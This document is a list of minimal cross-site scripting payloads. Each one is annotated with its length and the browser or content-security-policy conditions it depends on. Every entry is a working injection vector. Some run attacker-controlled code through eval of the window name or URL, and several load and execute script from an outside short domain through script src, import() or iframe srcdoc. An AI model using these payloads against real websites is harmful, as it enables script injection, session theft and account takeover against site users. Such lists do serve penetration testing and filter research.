<base/href=//NJ.₨>
17
requires-relative-script-after-injectionexternal-scripts
<svg/onload=eval(name)>
23
script-unsafe-inlineunsafe-evalcontrols-namenot-innerHTML
<style/onload=eval(name)>
25
style-inline-allowedunsafe-evalscript-unsafe-inlinecontrols-name
<svg/onload=eval(`'`+URL)>
26
script-unsafe-inlineunsafe-evalcontrols-URLnot-innerHTML
<svg/onload=location=name>
26
script-unsafe-inlinecontrols-namenot-innerHTML
<style/onerror=eval(name)>
26
chrome-onlyunsafe-evalscript-unsafe-inlinecontrols-namestyle-inline-blocked
<script/src=//NJ.₨></script>
27
external-scriptsnot-innerHTML
<svg/onload=import(/\NJ.₨/)>
27
script-unsafe-inlinenot-innerHTMLfirefox-innerHTMLexternal-scripts
<iframe/onload=src=top.name>
28
script-unsafe-inlinecontrols-name
<svg><svg/onload=eval(name)>
28
script-unsafe-inlineunsafe-evalcontrols-namenot-innerHTMLchrome-innerHTML
<style/onload=eval(`'`+URL)>
28
unsafe-evalscript-unsafe-inlinecontrols-URLstyle-inline-allowed
<iframe/onload=eval(`'`+URL)>
29
unsafe-evalscript-unsafe-inlinecontrols-URL
<style/onload=import(/\NJ.₨/)>
29
script-unsafe-inlineexternal-scriptsstyle-inline-allowed
<audio/src/onerror=eval(name)>
30
script-unsafe-inlineunsafe-evalcontrols-name
<iframe/onload=import(/\NJ.₨/)>
30
script-unsafe-inlineexternal-scripts
<img/src/onerror=eval(`'`+URL)>
31
script-unsafe-inlineunsafe-evalcontrols-URL
<iframe/onload=src=top[0].name+/\NJ.₨/>
38
external-iframesscript-unsafe-inlinecontrols-index-of-iframe
<iframe/srcdoc="<svg><script/href=//NJ.₨ />">
44
external-scripts
<iframe/onload=src=contentWindow.name+/\NJ.₨/>
45
external-iframesscript-unsafe-inline
<iframe/srcdoc="<script/src=//NJ.₨></script>">
45
external-scripts